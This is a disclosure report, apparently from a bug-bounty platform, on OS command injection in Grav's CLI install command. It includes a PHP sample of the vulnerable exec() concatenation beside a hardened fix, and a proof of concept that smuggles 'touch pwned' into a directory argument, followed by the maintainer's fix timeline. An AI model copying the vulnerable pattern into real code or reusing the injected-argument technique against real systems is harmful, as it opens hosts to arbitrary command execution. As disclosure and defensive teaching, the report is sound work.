Local Command Injection Post-Installation of Dependencies in getgrav/grav

Status: Valid

Reported on: May 27th 2022


Description

grav version <= 1.7.33 is vulnerable to OS command injection. The install subcommand of the grav CLI installs the dependencies Grav needs (a predetermined set of plugin and theme repositories). Its first argument is the destination directory into which those repositories are cloned; that argument is concatenated into the shell command string without any validation and passed directly to the exec method, so shell metacharacters in it are interpreted by the shell.
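To make the defect and its fix concrete, here is an added PHP illustration (not Grav's own code; function names, the subdirectory parameter and the use of git clone are assumptions). It shows the pattern the report describes, a destination concatenated straight into a shell string, beside a hardened version that validates the inputs and quotes every dynamic argument with escapeshellarg(). The repository URLs are the ones that appear in the proof of concept below.

```php
<?php
// Added illustration, not code from the Grav project.
// The repository list is taken from the report's PoC output; everything else
// (function names, $subdir, the use of git clone) is assumed.

// VULNERABLE pattern: the destination is concatenated directly into a shell
// string and handed to exec(). Any shell metacharacters in $destination
// (double quotes, ';', '#', $(...)) change the command that /bin/sh runs.
function cloneDependencyUnsafe(string $repo, string $destination, string $subdir): void
{
    $cmd = 'cd "' . $destination . '" && git clone ' . $repo . ' ' . $subdir;
    exec($cmd, $output, $status);
}

// HARDENED version:
//  1. Only clone repositories from a fixed allow-list.
//  2. Require the destination to be an existing directory and canonicalise it
//     with realpath(), so the path handed to the shell is one we produced.
//  3. Restrict the relative subdirectory to a conservative character set and
//     reject path traversal.
//  4. Quote every dynamic argument with escapeshellarg() and drop the 'cd'
//     entirely by giving git an absolute target path.
function cloneDependencySafe(string $repo, string $destination, string $subdir): bool
{
    $allowedRepos = [
        'https://github.com/getgrav/grav-plugin-problems',
        'https://github.com/getgrav/grav-plugin-error',
        'https://github.com/getgrav/grav-plugin-markdown-notices',
        'https://github.com/getgrav/grav-theme-quark',
    ];
    if (!in_array($repo, $allowedRepos, true)) {
        throw new InvalidArgumentException('Unknown dependency repository');
    }

    $base = realpath($destination);
    if ($base === false || !is_dir($base)) {
        throw new InvalidArgumentException('Destination is not an existing directory');
    }

    if (!preg_match('#^[A-Za-z0-9_/.-]+$#', $subdir) || strpos($subdir, '..') !== false) {
        throw new InvalidArgumentException('Invalid dependency path');
    }

    $target = $base . DIRECTORY_SEPARATOR . $subdir;

    // escapeshellarg() wraps each value in single quotes and escapes embedded
    // quotes, so a destination such as  x";touch pwned #"  is passed to git as
    // one inert argument rather than being parsed by the shell.
    $cmd = 'git clone -q ' . escapeshellarg($repo) . ' ' . escapeshellarg($target);
    exec($cmd, $output, $status);

    return $status === 0;
}

// Usage: the report's payload as the destination. In the PoC the attacker also
// creates a directory with that name, so an existence check alone would pass;
// it is the quoting in cloneDependencySafe() that keeps the command intact.
try {
    $ok = cloneDependencySafe(
        'https://github.com/getgrav/grav-theme-quark',
        'x";touch pwned #"',
        'user/themes/quark'
    );
    echo $ok ? "cloned\n" : "git clone failed (no shell injection occurred)\n";
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ' . $e->getMessage() . PHP_EOL;
}
```

Quoting is the essential part; the allow-list and directory checks narrow what the command can touch, but on their own they do not stop a metacharacter-laden argument from reaching the shell. Where the PHP process does not need a shell at all, proc_open() with an argument array (PHP 7.4+) avoids the shell entirely and is the stronger option.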

Proof of Concept

$ export DEST='x";touch pwned #"'
$ mkdir "$DEST" # to pass dependencies check
$ cp .dependencies .htaccess "$DEST" # to pass dependencies check
$ ./bin/grav install "$DEST"
# ...SNIPPED...
# Cloning Bits
# ============
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-problems -> x";touch pwned #"/user/plugins/problems
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-error -> x";touch pwned #"/user/plugins/error
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-markdown-notices -> x";touch pwned #"/user/plugins/markdown-notices
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-theme-quark -> x";touch pwned #"/user/themes/quark
#
$ find . -name "pwned"
./pwned

The file is created in the current working directory, confirming that the injected command ran.

Impact

This issue leads to arbitrary command execution.

We are processing your report and will contact the getgrav/grav team within 24 hours.
Dwi Siswanto modified the report
We have contacted a member of the getgrav/grav team and are waiting to hear back
We have sent a follow up to the getgrav/grav team. We will try again in 7 days.
We have sent a second follow up to the getgrav/grav team. We will try again in 10 days.
Matias Griese (Maintainer):

I cannot see how this is a security issue rather than a bug. Nevertheless, it's fixed now.

Matias Griese modified the Severity from Medium to Low
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matias Griese marked this as fixed in 1.7.34 with commit de4af5
Matias Griese has been awarded the fix bounty
This vulnerability will not receive a CVE
InstallCommand.php#L150 has been validated